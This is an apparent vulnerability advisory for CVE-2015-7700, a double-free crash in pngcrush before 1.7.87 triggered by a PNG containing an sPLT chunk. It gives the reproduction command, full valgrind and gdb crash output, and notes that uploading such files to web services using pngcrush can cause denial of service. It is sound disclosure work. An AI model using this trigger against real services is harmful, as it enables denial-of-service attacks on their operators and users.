pngcrush double-free/segfault could result in DoS (CVE-2015-7700)

All versions of pngcrush (pmt.sourceforge.net/pngcrush) prior to version 1.7.87 have a double-free segfault that can be triggered by reading a valid PNG file that contains the sPLT chunk. This bug has been fixed in 1.7.87 by the project maintainer. Persuading someone to run pngcrush with a valid PNG file that contains the sPLT chunk, or submitting such PNG file remotely to a web-based service that accepts PNG files and processes them with pngcrush, will cause the application to segfault. This can at a minimum cause denial-of-service. ./pngcrush -reduce -brute ps1n0g08.png /dev/null ==56277== Invalid read of size 8 ==56277== at 0x44989E: png_free_data (png.c:542) ==56277== by 0x412D99: main (pngcrush.c:6061) ==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd ==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299) ==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294) ==56277== by 0x478E9E: png_malloc_base (pngmem.c:91) ==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115) ==56277== by 0x478E9E: png_realloc_array (pngmem.c:145) ==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013) ==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746) ==56277== by 0x47BE1D: png_read_info (pngread.c:222) ==56277== by 0x40BA8E: main (pngcrush.c:5082) ==56277== Pointer 0x5555555555555555 not found ==56277== Invalid free() / delete / delete[] / realloc() ==56277== at 0x4C27C59: free (vg_replace_malloc.c:476) ==56277== by 0x4498A6: png_free_data (png.c:542) ==56277== by 0x412D99: main (pngcrush.c:6061) ==56277== Address 0x5555555555555555 is not stack'd, malloc'd or (recently) free'd ==56277== ==56277== Invalid read of size 8 ==56277== at 0x4498B1: png_free_data (png.c:543) ==56277== by 0x412D99: main (pngcrush.c:6061) ==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd ==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299) ==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294) ==56277== by 0x478E9E: png_malloc_base (pngmem.c:91) ==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115) ==56277== by 0x478E9E: png_realloc_array (pngmem.c:145) ==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013) ==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746) ==56277== by 0x47BE1D: png_read_info (pngread.c:222) ==56277== by 0x40BA8E: main (pngcrush.c:5082) ==56277== ==56277== Invalid write of size 8 ==56277== at 0x4498C8: png_free_data (png.c:544) ==56277== by 0x412D99: main (pngcrush.c:6061) ==56277== Address 0x5ac66b0 is 0 bytes after a block of size 32 alloc'd ==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299) ==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294) ==56277== by 0x478E9E: png_malloc_base (pngmem.c:91) ==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115) ==56277== by 0x478E9E: png_realloc_array (pngmem.c:145) ==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013) ==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746) ==56277== by 0x47BE1D: png_read_info (pngread.c:222) ==56277== by 0x40BA8E: main (pngcrush.c:5082) ==56277== ==56277== Invalid write of size 8 ==56277== at 0x4498D0: png_free_data (png.c:545) ==56277== by 0x412D99: main (pngcrush.c:6061) ==56277== Address 0x5ac66c0 is 16 bytes after a block of size 32 alloc'd ==56277== at 0x4C26B3F: malloc (vg_replace_malloc.c:299) ==56277== by 0x433A23: pngcrush_debug_malloc (pngcrush.c:2294) ==56277== by 0x478E9E: png_malloc_base (pngmem.c:91) ==56277== by 0x478E9E: png_malloc_array_checked (pngmem.c:115) ==56277== by 0x478E9E: png_realloc_array (pngmem.c:145) ==56277== by 0x4E2A7F: png_set_sPLT (pngset.c:1013) ==56277== by 0x4C93B2: png_handle_sPLT (pngrutil.c:1746) ==56277== by 0x47BE1D: png_read_info (pngread.c:222) ==56277== by 0x40BA8E: main (pngcrush.c:5082) ==56277== Best pngcrush method = 105 (ws 11 fm 4 zl 8 zs 0) = 110 for output to /dev/null (9.84% critical chunk reduction) (100.00% filesize reduction) CPU time decoding 0.610, encoding 1.930, other 0.780, total 3.320 sec. Pointer 0x5555555555555555 not found Program received signal SIGSEGV, Segmentation fault. *__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709 3709 malloc.c: No such file or directory. (gdb) bt #0 *__GI___libc_free (mem=0x5555555555555555) at malloc.c:3709 #1 0x00000000004498a7 in png_free_data () at png.c:542 #2 0x0000000000412d9a in main () at pngcrush.c:6061 (gdb) i r rax 0x0 0 rbx 0x7864d0 7890128 rcx 0x7ffff789f9d0 140737346402768 rdx 0x7ffff7b56e00 140737349250560 rsi 0x25 37 rdi 0x5555555555555555 6148914691236517205 rbp 0x786750 0x786750 rsp 0x7fffffffcfd0 0x7fffffffcfd0 r8 0x7ffff7fde700 140737354000128 r9 0x1 1 r10 0x0 0 r11 0x246 582 r12 0x20 32 r13 0x20 32 r14 0x1 1 r15 0x100 256 rip 0x7ffff784a939 0x7ffff784a939 <*__GI___libc_free+25> eflags 0x10206 [ PF IF RF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0